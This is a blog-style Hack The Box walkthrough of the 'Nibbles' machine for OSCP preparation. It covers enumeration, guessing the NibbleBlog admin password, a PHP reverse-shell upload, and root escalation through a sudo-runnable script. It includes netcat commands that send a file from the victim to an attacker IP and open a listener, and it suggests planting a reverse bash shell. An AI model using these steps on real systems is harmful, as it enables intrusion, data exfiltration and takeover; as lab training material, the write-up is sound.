Hackthebox NIBBLES Walkthrough (NO Metasploit) OSCP Prep.
Box Details
OS: Linux
Exploitable service: vulnerable web application and bad password
Difficulty: Easy
Estimated time: 1 hour 30 minutes
Noted: This is an extensive walkthrough and covers my thought process
Nmap Enumeration
run an nmap scan to discover open ports
nmap -sC -sV -A 10.10.10.75 this will perform a service version enumeration, run defaults scripts, traceroute, and os enumeration.
The scan results show us that there are only 2 ports available, SSH on port 22 and apache 2.4.18 on port 80. Normally i would check for the availabilty of a vulnerability on services version. But i decide to focus on the webserver has it has higher chance to gain initial access.
Just to confirm the open ports, i run another nmap scan to check for all ports. This comes out the same as the other.
So its time to enumerate the webserver using a web-browser, i visited the page and was presented with an almost empty web pages that say “hello world!”.
So i check the source code of the website by the key combination Ctrl + u. There are hints of a /nibbleblog directory found in the source code.
so i visit the directory and it appears to be a blog
i performed further enumeration the page and had a theory this could involve some LFI or RFI
after multiple trials, nothing came out so i proceed to do a directory brute force on /nibbleblog directory.
Found some interesting directories which led me further to gaining access
visited the README file which gave me for information about the blog
The nibble blog version 4.0.3 had a vulnerability in which an authenticated used had to upload a malicious php file via a plugin and execute it . Read more about this on https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html .
But i had to obtain credentials to login via the /admin.php page.
I decided to enumerate all discovered directories to find something useful. This took a lot time, as i had to manually go through all files in each directory. I found the username but no password.
Now i had idea to immediately brute force the login page. Well this was a bad idea.
my brute force attack was slow because i was using community edition of burp suite(i wasted time on this cause i tried multiple word lists) but had to check the server responses to realize i was just wasting my time. As the web application had an anti-brute force protection.
I was perplexed, how was i to gain access into the box? In my opinion this was the hardest and most frustrating part of this box.
I resulted to password guessing and searching for default password which didn't exit. Well it all ended when i asked a friend for help regarding this box and his was like “its just in front of you” and “don't think outside the box”. A random trial of the box name as the password was all it took. The password was nibbles which i found quite annoying.
So i wasted no time in gaining access, i followed instructions on the box from the vulnerability proof of concept.
so i uploaded a php shell file you can get one from pentestmonkey github page https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
remember to change your attacking ip before uploading
Ignore the warnings
Navigate to /content/private/plugins/my_image to execute the php shell
Click image.php and get a reverse shell. I hope you have a netcat listener alreading running?
we got a reverse shell as the nibbler user and we can read user.txt file
There is also a personal.zip file on the nibbler home directory we unzip and see the contents
There is a monitor.sh script which belongs to the nibbler user,
Next i try to run the script to see what it does. It seems like a script that does some monitoring on the host
Next i try to exfiltrate/transfer the script via netcat and examine
on victim run nc 10.10.14.5 2021 < monitor.sh
on attacking machine run nc -lvnp 2021 > monitor.sh
I find something suspicious on the script. Seems its executing something as root and this prompts me to run sudo -l immediately. I realized this was a simple privilege escalation.
It appears i can run the script monitor.sh as root and since it belongs to nibbler user i can edit the contents or probably replace with something malicious.
So i removed the exiting monitor.sh script and replaced with mine i created on my kali to run bash. You could improvise on his and input a reverse bash shell script.
so i transferred a malicious shell back to the victim via netcat and my reverse shell got stuck. So I’ll relaunch it and hope its there lol! You might want to use wget and python http server to transfer files.
I got another shell back and tried to run the script
it didn’t work so i had to make it executable with chmod +x monitor.sh
Finally we are root! It was an annoying box but easy.
Thanks for reading. Many boxes write-ups are upcoming.
